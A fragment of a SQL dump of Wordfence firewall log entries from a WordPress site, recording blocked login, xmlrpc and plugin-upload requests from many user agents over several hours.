Network',NULL),(11311,0.000000,1630796154.623917,'\0\0\0\0\0\0\0\0\0\0���VE3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11312,0.000000,1630796508.273969,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11313,1630796554.878534,1630796554.774800,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11314,0.000000,1630796604.592338,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11315,0.000000,1630796867.317664,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11316,0.000000,1630797198.979552,'\0\0\0\0\0\0\0\0\0\0���Do�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11317,0.000000,1630798006.446403,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11318,0.000000,1630798377.893912,'\0\0\0\0\0\0\0\0\0\0��h�w�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11319,0.000000,1630798466.117416,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11320,0.000000,1630798946.373684,'\0\0\0\0\0\0\0\0\0\0��Bt�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11321,0.000000,1630799144.882043,'\0\0\0\0\0\0\0\0\0\0��_o�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11322,0.000000,1630799908.922015,'\0\0\0\0\0\0\0\0\0\0��e ��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11323,0.000000,1630799915.110455,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11324,0.000000,1630800387.720083,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11325,0.000000,1630800634.877511,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11326,1630800672.276597,1630800672.182900,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11327,0.000000,1630800683.356922,'\0\0\0\0\0\0\0\0\0\0�����M',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11328,0.000000,1630800895.037472,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11329,0.000000,1630801394.115998,'\0\0\0\0\0\0\0\0\0\0���c�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11330,0.000000,1630801459.360989,'\0\0\0\0\0\0\0\0\0\0����}',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11331,0.000000,1630801904.007988,'\0\0\0\0\0\0\0\0\0\0��Vh\'�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11332,0.000000,1630802375.861435,'\0\0\0\0\0\0\0\0\0\0����tv',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11333,0.000000,1630802905.727452,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11334,0.000000,1630803005.073797,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11335,0.000000,1630803388.827267,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11336,0.000000,1630803786.922724,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11337,0.000000,1630804341.410856,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11338,1630804370.258021,1630804370.160400,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11339,0.000000,1630804459.602966,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11340,0.000000,1630804567.519778,'\0\0\0\0\0\0\0\0\0\0���~߱',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11341,0.000000,1630804960.281234,'\0\0\0\0\0\0\0\0\0\0����%�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11342,0.000000,1630805505.004538,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11343,0.000000,1630806035.811065,'\0\0\0\0\0\0\0\0\0\0��i9o',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11344,0.000000,1630806106.469373,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11345,0.000000,1630806120.906577,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11346,1630806135.779253,1630806135.665800,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11347,0.000000,1630806536.491295,'\0\0\0\0\0\0\0\0\0\0�����$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11348,0.000000,1630806665.639664,'\0\0\0\0\0\0\0\0\0\0���6�<',0,200,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11349,0.000000,1630806905.075136,'\0\0\0\0\0\0\0\0\0\0��ν',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11350,0.000000,1630807082.374434,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11351,0.000000,1630807167.886514,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11352,1630807178.507372,1630807178.185600,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11353,0.000000,1630807203.925676,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11354,1630807230.140386,1630807230.008100,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11355,0.000000,1630807620.937289,'\0\0\0\0\0\0\0\0\0\0����l[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11356,0.000000,1630807678.685480,'\0\0\0\0\0\0\0\0\0\0���;�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11357,0.000000,1630808184.660445,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11358,0.000000,1630808751.265059,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11359,0.000000,1630809352.845401,'\0\0\0\0\0\0\0\0\0\0��6\'�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11360,0.000000,1630809889.719510,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11361,0.000000,1630810012.285320,'\0\0\0\0\0\0\0\0\0\0��=��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11362,0.000000,1630810460.800183,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11363,0.000000,1630810787.115293,'\0\0\0\0\0\0\0\0\0\0��N/ɏ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11364,0.000000,1630811035.924083,'\0\0\0\0\0\0\0\0\0\0��aO�2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11365,0.000000,1630811614.961938,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11366,0.000000,1630811597.735664,'\0\0\0\0\0\0\0\0\0\0���n��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11367,0.000000,1630812157.523010,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11368,0.000000,1630812264.376321,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11369,1630812303.341421,1630812303.211400,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11370,0.000000,1630812350.009985,'\0\0\0\0\0\0\0\0\0\0��ܧe',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11371,0.000000,1630812417.919105,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11372,1630812451.048938,1630812450.956700,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11373,0.000000,1630812582.305266,'\0\0\0\0\0\0\0\0\0\0����s�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11374,0.000000,1630812752.750675,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11375,0.000000,1630813129.928899,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11376,0.000000,1630813330.887818,'\0\0\0\0\0\0\0\0\0\0����X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11377,0.000000,1630813959.134063,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11378,0.000000,1630814522.672333,'\0\0\0\0\0\0\0\0\0\0���HҌ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11379,0.000000,1630815128.175657,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11380,0.000000,1630815280.720112,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11381,1630815316.811538,1630815316.723200,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11382,0.000000,1630815575.220081,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11383,0.000000,1630816334.338143,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11384,1630816344.314524,1630816344.219300,'\0\0\0\0\0\0\0\0\0\0���6�J',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11385,0.000000,1630817051.496222,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11386,0.000000,1630817792.026577,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11387,1630817806.023695,1630817805.934800,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11388,0.000000,1630817831.959256,'\0\0\0\0\0\0\0\0\0\0��\"B��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11389,0.000000,1630820190.697268,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11390,0.000000,1630821630.742505,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11391,1630821648.078360,1630821647.991200,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11392,0.000000,1630823335.677891,'\0\0\0\0\0\0\0\0\0\0��Xc�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11393,0.000000,1630824127.220291,'\0\0\0\0\0\0\0\0\0\0���aZ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11394,0.000000,1630824494.723767,'\0\0\0\0\0\0\0\0\0\0���q',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11395,0.000000,1630824921.738136,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11396,0.000000,1630825712.961051,'\0\0\0\0\0\0\0\0\0\0���_S�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 